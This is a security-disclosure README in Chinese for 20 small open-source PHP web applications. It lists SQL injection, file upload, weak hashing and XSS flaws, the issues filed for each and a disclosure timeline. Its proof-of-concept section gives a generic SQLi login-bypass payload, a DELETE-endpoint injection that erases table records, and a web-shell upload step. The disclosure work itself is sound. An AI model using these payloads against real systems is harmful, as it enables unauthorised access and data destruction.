abdurazzoqovjavohir700-dev/security-disclosures-2026

# 安全披露 2026 ## 摘要 | # | CVE 候选 | 应用程序 | 漏洞 | CVSS | 状态 | |---|---|---|---|---|---| | 1 | 待定 | [医院管理系统](https://github.com/kishan0725/Hospital-Management-System) | SQL 注入 + 明文密码 | 9.8 严重 | [Issue #72](https://github.com/kishan0725/Hospital-Management-System/issues/72) | | 2 | 待定 | [血库](https://github.com/varunsardana004/Blood-Bank) | SQL 注入 x3 | 9.8 严重 | [Issue #24](https://github.com/varunsardana004/Blood-Bank/issues/24) | | 3 | 待定 | [酒店管理系统](https://github.com/tushar-2223/Hotel-Management-System) | SQL 注入 x5 (DELETE/EDIT) | 9.8 严重 | [Issue #18](https://github.com/tushar-2223/Hotel-Management-System/issues/18) | | 4 | 待定 | [高级在线购物系统](https://github.com/PuneethReddyHC/online-shopping-system-advanced) | SQL 注入 + MD5 密码 | 9.8 严重 | [Issue #83](https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/83) | | 5 | 待定 | [在线考试系统](https://github.com/projectworldsofficial/online-examination-systen-in-php) | addslashes() 绕过 + 认证逻辑缺陷 | 9.8 严重 | [Issue #10](https://github.com/projectworldsofficial/online-examination-systen-in-php/issues/10) | | 6 | 待定 | [库存管理系统](https://github.com/PuneethReddyHC/inventory_management_system) | SQL 注入 + 硬编码后门凭证 | 9.8 严重 | [Issue #1](https://github.com/PuneethReddyHC/inventory_management_system/issues/1) | | 7 | 待定 | [在线购物系统](https://github.com/PuneethReddyHC/online-shopping-system) | SQL 注入 x3 | 9.8 严重 | [Issue #38](https://github.com/PuneethReddyHC/online-shopping-system/issues/38) | | 8 | 待定 | [大学活动管理系统](https://github.com/BhavanaG7/College-Event-Management-System) | 通过 multi_query() 的 SQL 注入 (5 个表) | 9.8 严重 | [Issue #10](https://github.com/BhavanaG7/College-Event-Management-System/issues/10) | | 9 | 待定 | [在线投票系统](https://github.com/itzzmerov/online-voting-system) | SQL 注入 + 无限制文件上传 + 开放重定向 | 9.8 严重 | [Issue #3](https://github.com/itzzmerov/online-voting-system/issues/3) | | 10 | 待定 | [求职门户](https://github.com/sabbirhosen44/Job-Portal) | 职位搜索中的 SQL 注入 | 8.8 高危 | [Issue #9](https://github.com/sabbirhosen44/Job-Portal/issues/9) | | 11 | 待定 | [在线书店](https://github.com/projectworldsofficial/online-book-store) | SQL 注入 + 认证逻辑缺陷 (AND/OR) + SHA1 | 9.8 严重 | [Issue #22](https://github.com/projectworldsofficial/online-book-store/issues/22) | | 12 | 待定 | [失物招领](https://github.com/AvinashAnand02/Lost-And-Found) | 分类管理中的 SQL 注入 | 8.8 高危 | [Issue #7](https://github.com/AvinashAnand02/Lost-And-Found/issues/7) | | 13 | 待定 | [在线披萨配送](https://github.com/darshankparmar/OnlinePizzaDelivery) | SQL 注入 + 反射型 XSS | 9.8 严重 | [Issue #5](https://github.com/darshankparmar/OnlinePizzaDelivery/issues/5) | | 14 | 待定 | [血库管理 DBMS](https://github.com/sarin32/Blood-Bank-Management-System-DBMS) | SQL 注入 x3 + 明文密码存储 | 9.8 严重 | [Issue #7](https://github.com/sarin32/Blood-Bank-Management-System-DBMS/issues/7) | | 15 | 待定 | [在线诊所管理系统](https://github.com/subhajitkhan/online-clinic-management-system) | 管理员 + 患者登录处的 SQL 注入 | 9.8 严重 | [Issue #1](https://github.com/subhajitkhan/online-clinic-management-system/issues/1) | | 16 | 待定 | [医院管理系统](https://github.com/blackburn3333/Hospital-Management-System) | DELETE 操作中的 SQL 注入 x2 | 9.8 严重 | [Issue #1](https://github.com/blackburn3333/Hospital-Management-System/issues/1) | | 17 | 待定 | [学生管理系统](https://github.com/ningzichun/student-management-system) | SQL 注入 x3 + 弱 MD5 哈希 | 9.8 严重 | [Issue #8](https://github.com/ningzichun/student-management-system/issues/8) | | 18 | 待定 | [在线预约管理](https://github.com/likhitaavl2k/Online-Appointment-Management-System) | 通过变量转义漏洞的 SQL 注入 | 9.8 严重 | [Issue #2](https://github.com/likhitaavl2k/Online-Appointment-Management-System/issues/2) | | 19 | 待定 | [学生管理系统](https://github.com/diveshlunker/Management-system-students) | SQL 注入 + 无限制文件上传 (RCE) | 9.8 严重 | [Issue #8](https://github.com/diveshlunker/Management-system-students/issues/8) | | 20 | 待定 | [药房管理系统](https://github.com/Varshini-E/Pharmacy-Management-System) | 5 个 DELETE endpoint 中的 SQL 注入 | 9.8 严重 | [Issue #6](https://github.com/Varshini-E/Pharmacy-Management-System/issues/6) | ## 漏洞类别 | CWE | 描述 | 数量 | |-----|-------------|-------| | CWE-89 | SQL 注入 | 18 | | CWE-434 | 无限制文件上传 (RCE) | 2 | | CWE-916 | 使用计算量不足的密码哈希 (MD5/SHA1) | 4 | | CWE-256 | 明文密码存储 | 3 | | CWE-798 | 硬编码凭证 | 1 | | CWE-601 | 开放重定向 | 1 | | CWE-287 | 不当认证（逻辑缺陷） | 2 | | CWE-79 | 跨站脚本攻击 (XSS) | 1 | ## 概念验证 ### SQLi 认证绕过（适用于所有登录表单的通用 PoC） ``` POST /login.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded username=admin'OR'1'='1'--+-&password=anything ``` ### DELETE endpoint 中的 SQLi（通用 PoC） ``` GET /delete.php?id=1'OR'1'='1 HTTP/1.1 ``` 结果：目标表中的所有记录均被删除。 ### 无限制文件上传 → 远程代码执行 ``` 1. Upload file named "shell.php" with content: 2. Access: /uploads/shell.php?cmd=id 3. Result: Command execution on server ``` ## CVE 申请状态 CVE 申请已提交至： - [x] MITRE (cve-assign@mitre.org) — 等待回复 - [x] GitHub Security Advisories — 已向维护者申请 - [ ] CVE 编号待分配 ## 披露时间表 - **2026-06-19** — 通过静态代码分析发现漏洞 - **2026-06-19** — 开启 GitHub issues（负责任的披露） - **2026-06-19** — 向 MITRE 和 GitHub CNA 申请分配 CVE - **2026-09-19** — 全面公开披露（90 天窗口期） ## 联系方式 如有关于这些披露的问题： **GitHub:** [@abdurazzoqovjavohir700-dev](https://github.com/abdurazzoqovjavohir700-dev) **Email:** abdurazzoqovjavohir700@gmail.com *所有漏洞均遵循 OWASP 负责任披露准则进行报告。*

标签：CISA项目, OpenVAS, PHP, RCE, XSS, 安全披露, 漏洞情报, 漏洞报告, 防御加固